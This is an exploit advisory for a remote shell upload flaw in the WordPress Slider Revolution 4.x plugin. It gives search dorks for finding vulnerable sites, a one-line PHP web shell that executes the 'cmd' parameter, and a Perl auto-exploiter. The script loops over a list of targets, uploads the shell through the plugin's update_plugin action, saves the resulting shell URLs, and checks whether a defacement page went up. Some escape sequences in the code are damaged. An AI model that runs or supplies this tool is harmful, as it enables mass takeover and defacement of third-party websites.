Authored by indoushka

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

=================================================================================================
| # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit |
| # Author : indoushka |
| # Tested on : windows 10 Fran├žais V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index off revsliderbackup |
plugins/revslider/public/assets/css/settings.css |
revslider.php "index of" |
wp-content/plugins/revslider/ 2013 |
=================================================================================================

[+] poc :

[+] Web shell upload :

The following perl exploit will attempt to upload backdoor through the update_plugin function
To use the exploit, be sure to compress the backdoor file with name [revslider.zip]
Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension
Because the exploit uploads a compressed file to the target

[+] simple backdoor :

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine

[+] Perl exploit :

#!/usr/bin/perl

use LWP::UserAgent;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

head();

my $usage = " nperl $0 <list.txt>n perl $0 list.txt";
die "$usage" unless $ARGV[0];

open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;

my $path = "wp-admin/admin-ajax.php";

print "nTarget => $targetn";

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "n [+] Xploit Possibility Work :3n n";



print " [*] Try Exploiting Vulnerabilityn";
print " [*] Xploiting $targetn";

my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

print " [*] Sent payloadn";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print " [+] Payload successfully executedn";

print " [*] Checking if shell was uploadedn";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
if($check =~/<br>/) {

print " [+] Shell successfully uploadedn";
open(save, '>>Shell.txt');
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zebn";
close(save);


print " [*] Checking if Deface was uploaded nown";

my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {

print " [+] Deface uploaded successfulln";


} else {print " [-] Deface not Uploaded :/"; }
} else { print " [-] I'think Shell Not Uploaded :/n"; }
} else {
print " [-] Payload failed: Failn";
print "n";

}
} else { print "n [-]Xploit Fail n"}

sub head {
print "t +===============================================n";
print "t | Auto Exploiter Revslider Shell Upload n";
print "t | Edited: indoushkan";
print "t +===============================================n";
}
}

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================